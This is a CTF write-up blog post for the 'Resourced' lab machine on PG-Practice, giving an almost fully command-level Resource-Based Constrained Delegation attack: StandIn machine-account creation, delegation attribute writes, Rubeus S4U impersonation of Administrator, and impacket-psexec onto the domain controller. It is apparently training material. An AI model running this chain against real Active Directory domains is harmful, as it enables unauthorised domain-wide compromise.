• Home
  • Blog
  • CTF
  • Resource-Based Constrained Delegation – Resourced @ PG-Practice

Resource-Based Constrained Delegation – Resourced @ PG-Practice

27Aug

Resource-Based Constrained Delegation – Resourced @ PG-Practice

By CTF , , ,

Video & additional notes for Resourced, an intermediate difficulty Windows machine on PG-Practice that involves password spraying and an RBCD attack.

RBCD via WinRM & StandIn

# Upload
upload /home/xct/drop/StandIn_v13_Net45.exe StandIn.exe
upload /home/xct/drop/Rubeus.exe Rubeus.exe

# Create machine account
.\StandIn.exe --computer xct --make
Get-ADComputer -Filter * | Select-Object Name, SID

# Write msDS-AllowedToActOnBehalfOfOtherIdentity
.\StandIn.exe --computer ResourceDC --sid S-1-5-21-537427935-490066102-1511301751-4101

# Get Hash (on Kali)
import hashlib,binascii
hash = hashlib.new('md4', "<new machine password from last step>".encode('utf-16le')).digest()
print(binascii.hexlify(hash))

# Impersonate Administrator
.\Rubeus.exe s4u /user:xct /rc4:44714c0e1624e71ac5540fd3aa9c6681 /impersonateuser:administrator /msdsspn:cifs/resourcedc.resourced.local /nowrap /ptt

# Convert Ticket & PSExec with Kerberos (on Kali)
cat ticket.b64 | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=`pwd`/ticket.ccache
klist
impacket-psexec -k -no-pass resourced.local/administrator@resourcedc.resourced.local -dc-ip 192.168.114.175

Resources

Share this post

Author

Related Posts

28Mar

Helpline @ HackThebox

Helpline is a really fun box on hackthebox.eu, which I was lucky enough to get system first blood on :)... read more

14Apr

Kryptos @ HackTheBox

Kryptos is 50 points machine on hackthebox, involving some interesting techniques, like setting up a fake database and making the... read more

06Nov

Active Directory, Reverse Engineering & Unintended Solutions – Pivotapi @ HackTheBox

We are solving Pivotapi, a 50-point Windows machine on HackTheBox. This one involves some Reverse Engineering, MSSQL, and Active Directory... read more

16May

SwagShop @ HackTheBox

SwagShop is a very easy machine on hackthebox, involving a public exploit and sudo abuse. read more

02Mar

Access @ HackTheBox

In this short writeup I will show how I completed Access on hackthebox.eu, a quite easy windows box that involves... read more

27Feb

Protected: Dream Diary 3 @ HackTheBox

There is no excerpt because this is a protected post. read more

08Feb

Ypuffy @ HackTheBox

Ypuffy is a rather unique machine on hackthebox.eu because it features OpenBSD as operating system. In my version of getting... read more

19Jun

Squidception, OpenSMTPD & Kerberos – Tentacle @ HackTheBox

We are going to solve Tentacle, a 40-point machine on HackTheBox which involves a bit of Squid Proxy Magic 🦑(🦑... read more

24Apr

DynamoDB & S3 Buckets – Bucket @ HackTheBox

We are going to solve Bucket, a medium Linux machine on HackTheBox. We get credentials from DynamoDB, upload a webshell... read more

17Aug

Heist @ HackTheBox

Heist is an "easy" machine on hackthebox, involving some enumeration (especially rpc) and some forensics (dumping firefox memory). read more